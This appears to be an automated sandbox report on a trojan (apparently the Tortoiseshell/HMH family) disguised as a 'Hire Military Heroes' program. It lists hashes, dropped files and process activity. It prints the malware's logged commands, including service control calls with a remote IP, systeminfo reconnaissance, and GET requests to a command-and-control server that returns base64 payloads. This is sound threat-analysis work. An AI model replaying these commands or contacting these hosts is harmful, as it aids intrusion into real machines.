File name:

win10.exe

Full analysis: https://app.any.run/tasks/baae8ef7-0255-4b3a-8fd8-bb0ef3ba32b6
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: September 25, 2019, 05:39:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

A194E3BF830104922295C37E6D19D9A2

SHA1:

0D375268ABCE613D6679EF32909BBB95D62CAF30

SHA256:

C121F97A43F4613D0A29F31EF2E307337FA0F6D4F4EEE651EE4F41A3DF24B6B5

SSDEEP:

6144:Svb4jktuBZTO5oKF7H2dBmplYeAqyeZlhl4BOIW3Btkt:SE+u8FydmlYIZlv4kIWC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • IvizTech.exe (PID: 1140)
      • IvizTech.exe (PID: 3824)
      • Bird.exe (PID: 3756)

    • Runs app for hidden code execution

      • Bird.exe (PID: 3756)

  • SUSPICIOUS

    • Executed as Windows Service

      • IvizTech.exe (PID: 1140)

    • Executable content was dropped or overwritten

      • win10.exe (PID: 3332)

    • Starts CMD.EXE for commands execution

      • Bird.exe (PID: 3756)
      • win10.exe (PID: 3332)
      • IvizTech.exe (PID: 1140)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 844)
      • cmd.exe (PID: 1476)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 1892)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (63.1)
.exe | Win64 Executable (generic) (23.8)
.dll | Win32 Dynamic Link Library (generic) (5.6)
.exe | Win32 Executable (generic) (3.8)
.exe | Generic Win/DOS Executable (1.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:08:07 19:56:57+02:00
PEType: PE32
LinkerVersion: 48
CodeSize: 251392
InitializedDataSize: 17408
UninitializedDataSize: -
EntryPoint: 0x3f4de
OSVersion: 4
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 1.6.0.0
ProductVersionNumber: 1.6.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: Hire Military Heroes
CompanyName: HMH Inc.
FileDescription: Hire Military Heroes
FileVersion: 1.6.0.0
InternalName: HMH.exe
LegalCopyright: Copyright © HMH Intl 2020
LegalTrademarks: HMH
OriginalFileName: HMH.exe
ProductName: HMH
ProductVersion: 1.6.0.0
AssemblyVersion: 1.0.0.0

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 07-Aug-2019 17:56:57
Debug artifacts:
  • D:\Projects\AutoHMH\AutoHMH\obj\Debug\HMH.pdb
Comments: Hire Military Heroes
CompanyName: HMH Inc.
FileDescription: Hire Military Heroes
FileVersion: 1.6.0.0
InternalName: HMH.exe
LegalCopyright: Copyright © HMH Intl 2020
LegalTrademarks: HMH
OriginalFilename: HMH.exe
ProductName: HMH
ProductVersion: 1.6.0.0
Assembly Version: 1.0.0.0

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 07-Aug-2019 17:56:57
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00002000
0x0003D4E4
0x0003D600
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
7.86603
.rsrc
0x00040000
0x00004138
0x00004200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.73507
.reloc
0x00046000
0x0000000C
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
0.10191

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.92073
829
UNKNOWN
UNKNOWN
RT_MANIFEST
32512
1.51664
20
UNKNOWN
UNKNOWN
RT_GROUP_ICON

Imports

mscoree.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
12
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
drop and start drop and start start win10.exe bird.exe no specs iviztech.exe no specs cmd.exe no specs iviztech.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs systeminfo.exe no specs cmd.exe no specs sc.exe no specs win10.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
844"cmd.exe" /C sc stop dllhostC:\Windows\system32\cmd.exewin10.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1140"C:\Users\admin\AppData\Local\Temp\IvizTech.exe"C:\Users\admin\AppData\Local\Temp\IvizTech.exeservices.exe
User:
SYSTEM
Company:
IvizTech
Integrity Level:
SYSTEM
Description:
Dllhost
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\iviztech.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1476"cmd.exe" /C sc start dllhost http://66.42.78.193C:\Windows\system32\cmd.exewin10.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1056
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1892"cmd.exe" /c systeminfoC:\Windows\system32\cmd.exeIvizTech.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2912sc start dllhost http://66.42.78.193C:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
A tool to aid in developing services for WindowsNT
Exit code:
1056
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3044"C:\Users\admin\AppData\Local\Temp\win10.exe" C:\Users\admin\AppData\Local\Temp\win10.exeexplorer.exe
User:
admin
Company:
HMH Inc.
Integrity Level:
MEDIUM
Description:
Hire Military Heroes
Exit code:
3221226540
Version:
1.6.0.0
Modules
Images
c:\users\admin\appdata\local\temp\win10.exe
c:\systemroot\system32\ntdll.dll
3108"cmd.exe"C:\Windows\system32\cmd.exeBird.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3332"C:\Users\admin\AppData\Local\Temp\win10.exe" C:\Users\admin\AppData\Local\Temp\win10.exe
explorer.exe
User:
admin
Company:
HMH Inc.
Integrity Level:
HIGH
Description:
Hire Military Heroes
Exit code:
0
Version:
1.6.0.0
Modules
Images
c:\users\admin\appdata\local\temp\win10.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3384sc stop dllhostC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
A tool to aid in developing services for WindowsNT
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3576systeminfoC:\Windows\system32\systeminfo.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Displays system information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
111
Read events
85
Write events
26
Delete events
0

Modification events

(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3332) win10.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\win10_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
2
Suspicious files
0
Text files
23
Unknown types
0

Dropped files

PID
Process
Filename
Type
3824IvizTech.exeC:\Users\admin\AppData\Local\Temp\IvizTech.InstallLogtext
MD5:
SHA256:
3824IvizTech.exeC:\Users\admin\AppData\Local\Temp\InstallUtil.InstallLogtext
MD5:
SHA256:
3332win10.exeC:\Users\admin\AppData\Local\Temp\IvizTech.exeexecutable
MD5:
SHA256:
3824IvizTech.exeC:\Users\admin\AppData\Local\Temp\IvizTech.InstallStatexml
MD5:FFB29BD88BD23C639985F1D369DBD1CA
SHA256:1ADB4F9D1D152E018246A0A2762B473D910906340207F57D3F8CE1097E1DE09F
3332win10.exeC:\Users\admin\AppData\Local\Temp\Bird.exeexecutable
MD5:C5CDF5166D7B5C443EBC2FD0F3F884F8
SHA256:EC71068481C29571122B2F6DB1F8DC3B08D919A7F710F4829A07FB4195B52FAC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3332
win10.exe
GET
200
199.187.208.75:80
http://199.187.208.75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdterkudhf2
US
xml
115 Kb
malicious
3332
win10.exe
GET
200
199.187.208.75:80
http://199.187.208.75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdterkudhfs
US
xml
16.7 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3332
win10.exe
199.187.208.75:80
Total Server Solutions L.L.C.
US
malicious

DNS requests

Domain
IP
Reputation
www.google.com
  • 172.217.21.228
malicious

Threats

PID
Process
Class
Message
3332
win10.exe
A Network Trojan was detected
ET TROJAN Tortoiseshell/HMH Download Request
3332
win10.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3332
win10.exe
A Network Trojan was detected
MALWARE [PTsecurity] Inbox.Toolbar Install xml Server Response
3332
win10.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
win10.exe